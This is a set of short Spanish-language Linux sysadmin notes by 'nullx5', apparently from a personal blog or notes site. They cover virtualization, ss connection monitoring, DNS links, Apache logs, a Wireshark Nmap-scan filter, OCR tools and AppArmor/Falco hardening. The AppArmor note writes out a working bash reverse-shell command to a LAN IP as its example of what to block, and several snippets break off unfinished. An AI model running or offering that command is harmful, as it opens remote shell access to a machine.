nullx5

qemu libvirt virt-install virsh

┌────────────────────────────────────────────────────────────────────────────────┐
│                            Herramientas de usuario                             │
│                                                                                │
│  qemu-system   virt-install        virt-clone                  virsh           │
│   (crear VM)    (crear VM)     (backups clonar VM)   (administrar y snapshots) │
└───────────────┬───────────────┬────────────────────────────────────────────────┘

nullx5

logs ss y lsof

ss

#!/usr/bin/bash

while true; do                                                                       
  sudo ss -tunp
 sleep 2

nullx5

SISTEMA DNS domain name system - dns

Documentacion:

• https://www.fpgenred.es/DNS/
• https://labex.io/lesson/what-is-dns
• https://drive.google.com/file/d/1iD_rmCWLLhGrvJxraDkRTyNUOZxe7IKJ/view?usp=sharing #componentes DNS y flujo de una consulta
• https://www.cloudflare.com/es-es/learning/dns/what-is-dns/
• https://www.cloudflare.com/es-es/learning/dns/dns-records/ # registros DNS
• https://www.cloudflare.com/es-es/learning/email-security/dmarc-dkim-spf/ # SPF DKIM DMARC | registros TXT
• https://www.cloudflare.com/es-es/learning/dns/dnssec/how-dnssec-works/ # DNSSEC

nullx5

goaccess logs apache

sudo tail -f /var/log/apache2/access.log

                                                                                                                                                               INT ✘  6s    ▓▒░
192.168.100.35 - - [18/Dec/2025:01:27:30 -0500] "GET / HTTP/1.1" 200 3460 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.168.100.35 - - [18/Dec/2025:01:27:30 -0500] "GET /icons/ubuntu-logo.png HTTP/1.1" 200 3607 "http://192.168.100.35/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.168.100.35 - - [18/Dec/2025:01:27:30 -0500] "GET /favicon.ico HTTP/1.1" 404 492 "http://192.168.100.35/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"

nullx5

🔥 Filtros Wireshark – detectar escaneo Nmap SYN Scan (hacia tu IP) y Detecta ping y arp a mi maquina:

((tcp.flags.syn == 1 && tcp.flags.ack == 0 && ip.dst == 192.168.100.35) || (icmp && ip.dst == 192.168.100.35) || (arp && arp.dst.proto_ipv4 == 192.168.100.35)) && !(ip.addr == 8.8.8.8)

👀 Tip forense rápido

Después de aplicar el filtro:

nullx5

configurar apparmor

• crear perfiles por aplicacion

Bloquear reverse shell bash -i >& /dev/tcp/192.168.100.5/443 0>&1

sudo apt install apparmor

sudo systemctl status apparmor

nullx5

¿Qué es una regla Falco anti-reverse-shell?

Falco es un motor de detección de amenazas en tiempo real para Linux (CNCF), creado por Sysdig.

🛡️ ¿Bloquea Falco?

❌ No bloquea por sí solo ✔ Detecta con precisión quirúrgica

Pero puedes reaccionar automáticamente:

nullx5

Mis alias

# en la terminal con [alias status], despliega el conteniddo del alias
# en la terminal con alias lista todos los alias

nvim .zshrc

alias ubuntu="column -s, -t /usr/share/distro-info/ubuntu.csv | lolcat "
alias debian="column -s, -t /usr/share/distro-info/debian.csv | lolcat "

nullx5

convertir pdf o imagen a texto y pdf hacer pdf buscables con OCR.

sudo apt install gimagereader

sudo apt install tesseract-ocr
sudo apt install tesseract-ocr-spa    #lenguaje español
sudo apt install tesseract-ocr-eng    #lenguaje ingles

#permite convertir de pdf a texto plano - me gusta este de pdf a texto FACIL ✅

nullx5

SECOP II sistema viejo, se basa en VORTALgov, software europeo especializado en contratación electrónica (e-procurement) usado en varios países.

• ASP.NET WebForms (C#) + JavaScript + jQuery
• Microsoft .NET Framework
• Servidores Microsoft IIS
• SQL Server

Buscar Proceso de Contratación: